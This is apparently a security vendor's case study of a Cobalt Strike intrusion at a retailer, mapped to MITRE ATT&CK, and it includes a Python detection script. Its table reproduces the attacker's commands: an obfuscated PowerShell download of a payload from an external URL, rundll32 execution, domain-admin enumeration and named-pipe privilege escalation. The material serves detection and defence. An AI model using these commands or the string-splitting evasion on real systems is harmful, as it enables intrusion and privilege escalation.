MITRE ATT&CK Guides MSP on Cobalt Strike Threat Mitigation
The Network: A major retailer with over 2,500 employees and more than 100 stores and distribution centers is supported by an MSP that uncovered a cyber criminal weaponizing the legitimate IT tool Cobalt Strike for malware distribution.
The Expectation: Protect the retailer’s digital assets and sensitive data to maintain uptime and resiliency by avoiding malicious activity. Enable services like eCommerce that are crucial to retail organizations with supply chain partners and customers around the globe.
The Catch: The analyst team at Netsurion’s Security Operations Center (SOC) used advanced logic to detect an obfuscated, suspicious PowerShell command. It was followed by command execution through a named pipe for impersonation and privilege escalation. Detailed investigation of the detected sequence showed a Cobalt Strike attack.
Cobalt Strike is an exploit tool used by defenders and hackers alike. It is powerful and flexible at simulating attacks and testing network defenses. Cobalt Strike is available for registration and sale on legitimate websites and is also found on the criminal underground.
The Find: Netsurion’s SOC detected every detail of this malware attack and provided the retailer with detailed remediation recommendations. The analyst uncovered a dubious alert on a PowerShell process whose command-line argument appeared very suspicious: the parameter “DOWNLOAD FILE” was split as “D” + “Own” + “LOa” + “Dfi” + “le” to evade known detection controls. The legacy anti-virus was not sufficient to detect this threat tradecraft. Netsurion’s SOC analyst also noticed a URL in the command-line argument.
Malicious Cobalt Strike Tactics and Techniques in MITRE ATT&CK:
Creator Process Name | Suspicious Command Line Argument | Comments | Tactic | Technique | MITRE ATT&CK ID |
---|---|---|---|---|---|
cmd.exe | rundll32 b.dll,TstSec 11985756 | A suspicious DLL is loaded and ‘11985756’ is the parameter passed to the ‘TstSec’ function. Similar command-line arguments are involved in Cobalt Strike attacks, as shared by security research firms. | Defense Evasion | Signed Binary Proxy Execution | T1218.011 |
cmd.exe | powershell -nop -c $ds = "D" + "Own" + "LOa" + "DfI" + "le"; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke ("https://mail.pvpc.org/owa/auth/Current/lo.ttf", "C:\Windows\TEMP\ou.ttf") | A file with the .ttf extension is downloaded to the location “C:\Windows\TEMP\ou.ttf”. (Windows Defender detected the threat as ‘Behavior:Win32/CobaltStrike.H!nri’.) | Command and Control | Data Obfuscation | T1001 |
cmd.exe | rundll32 C:\Windows\TEMP\ou.ttf,lhdgbmas | Highly suspicious activity in which rundll32 loads a file without a DLL extension, believed to execute malicious shellcode. | Defense Evasion | Signed Binary Proxy Execution | T1218.011 |
rundll32.exe | C:\Windows\system32\cmd.exe /C nltest /dclist: | Enumeration commands executed | Discovery | Account Discovery | T1087 |
rundll32.exe | C:\Windows\system32\cmd.exe /C net group "Domain admins" /domain | Enumeration commands executed | Discovery | Account Discovery | T1087 |
rundll32.exe | C:\Windows\system32\cmd.exe /C nltest /domain_trusts | Enumeration commands executed | Discovery | Account Discovery | T1087 |
rundll32.exe | C:\Windows\system32\cmd.exe /C net group "Enterprise admins" /domain | Enumeration commands executed | Discovery | Account Discovery | T1087 |
rundll32.exe | C:\Windows\system32\net1 group "Enterprise admins" /domain | Enumeration commands executed | Discovery | Account Discovery | T1087 |
rundll32.exe | C:\Windows\system32\net1 group "Domain admins" /domain | Enumeration commands executed | Discovery | Account Discovery | T1087 |
svchost.exe | C:\Windows\system32\cmd.exe /c echo a848bdcc925 > \\.\pipe\c20734 | Named pipe commands are executed to escalate privileges. (Windows Defender detected the threat as ‘HackTool:Win32/NamedPipeImpers.A’.) | Privilege Escalation | Access Token Manipulation | T1134 |
svchost.exe | C:\Windows\system32\cmd.exe /c echo 48e31e1d13a > \\.\pipe\2d6265 | Named pipe commands are executed to escalate privileges. (Windows Defender detected the threat as ‘HackTool:Win32/NamedPipeImpers.A’.) | Privilege Escalation | Access Token Manipulation | T1134 |
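
The command-line patterns in the table can be expressed as process-creation rules. The Python below is an added example, not Netsurion's detection logic: the event tuples are constructed from the table (with a placeholder URL), and the function names and regexes are assumptions.

```python
import re
# Constructed process-creation events (parent image, command line), modelled on
# the table above. The URL is a placeholder, not the one from the incident.
EVENTS = [
    ("cmd.exe", r'powershell -nop -c $ds = "D" + "Own" + "LOa" + "DfI" + "le"; '
                r'Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('
                r'"https://example.invalid/lo.ttf", "C:\Windows\TEMP\ou.ttf")'),
    ("cmd.exe", r"rundll32 C:\Windows\TEMP\ou.ttf,lhdgbmas"),
    ("cmd.exe", r"rundll32 b.dll,TstSec 11985756"),
    ("rundll32.exe", r'C:\Windows\system32\cmd.exe /C net group "Domain admins" /domain'),
    ("svchost.exe", r"C:\Windows\system32\cmd.exe /c echo a848bdcc925 > \\.\pipe\c20734"),
    ("explorer.exe", r"C:\Windows\system32\cmd.exe /c echo hello > C:\Temp\out.txt"),
]

_CONCAT = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")
def fold_concat(cmd):
    """Join adjacent quoted literals ("D" + "Own" -> "DOwn") until nothing changes."""
    cmd = cmd.replace("\u201c", '"').replace("\u201d", '"')  # normalise curly quotes
    prev = None
    while prev != cmd:
        prev, cmd = cmd, _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', cmd)
    return cmd

_RUNDLL = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^\s,"]+)', re.I)
_PIPE = re.compile(r"/c\s+echo\s+\w+\s*>\s*\\\\\.\\pipe\\\w+", re.I)
_DISCO = re.compile(r"nltest\s+/(dclist|domain_trusts)|net1?\s+group\s+.*?/domain", re.I)
_DOWNLOAD = re.compile(r"downloadfile|downloadstring", re.I)

def detect(parent, cmd):
    """Return the ATT&CK IDs (as mapped in the table above) that a command line matches."""
    hits, folded = [], fold_concat(cmd)
    # Method name only appears after folding: it was split to dodge string matching.
    if _DOWNLOAD.search(folded) and not _DOWNLOAD.search(cmd):
        hits.append("T1001")
    m = _RUNDLL.search(cmd)
    if m and not m.group(1).lower().endswith(".dll"):  # unquoted paths with spaces not handled
        hits.append("T1218.011")
    if parent.lower() == "rundll32.exe" and _DISCO.search(cmd):
        hits.append("T1087")
    if _PIPE.search(cmd):
        hits.append("T1134")
    return hits

def scan(events):
    return [(cmd, detect(parent, cmd)) for parent, cmd in events]

if __name__ == "__main__":
    for cmd, hits in scan(EVENTS):
        print(hits or "-", cmd[:60])
```

The `rundll32 b.dll,TstSec` row is not matched by the extension rule, so catching it would need other context, such as the DLL's path or the parent chain.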
Observation: On accessing the URL in a controlled sandbox environment, Netsurion detected a file downloaded by the Cobalt Strike Beacon. To check the reputation of the artifact, the SOC analyst uploaded the file to an IP monitoring service, which ranked it as having a poor reputation. Reputation intelligence on IP addresses helps protect users from known malware or connection to suspicious domains that may be hosting phishing attacks or malware.
The Fix: Netsurion’s security analyst promptly notified the MSP about the detections. Rapid action stopped the further spread of Cobalt Strike. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The identified Cobalt Strike hashes were then added to Netsurion Threat Center, our threat intelligence repository, to assist in rapid detection across all Netsurion customers.
Recommendations to mitigate this Cobalt Strike malware include:
- Use strict password management and least privilege access policies
- Reinforce social engineering and anti-phishing awareness training
- Identify which systems, applications, and data lakes are mission-critical to your business and day-to-day operations and functions such as billing
- Implement frequent backups of crucial files and isolate them from local and open networks. Also keep offline backups of data stored in locations inaccessible from infected computers.
- Promptly patch software and applications and stay on top of vulnerability advisories
- Implement and practice a digital disaster recovery plan
- Monitor the attack surface with a 24/7/365 SOC
Netsurion’s security analyst continued to monitor the network for further infection and possible lateral movement.
The Lesson: With the rise in Ransomware-as-a-Service (RaaS), legitimate tools like Cobalt Strike are gaining traction with cyber criminals. Adversaries will likely continue to use legitimate cybersecurity tools to avoid detection. MSPs must remain vigilant as cyber criminals are persistent and ever evolving. It is also common for attackers to strike again at victims who have demonstrated weak defenses. As a global and objective framework, MITRE ATT&CK is a structured way to learn from real-world adversaries. Netsurion’s Managed Open XDR offers defense-in-depth coverage and 24/7 monitoring that prevents the spread of this dangerous malware to other systems and devices.
What is Cobalt Strike and how does it work?
Cobalt Strike is weaponized software that deploys a difficult-to-detect beacon to a target. But how does it get onto your system and evade existing security controls? How can you detect and decontaminate if you’ve been affected? Watch this 10-minute overview to find out.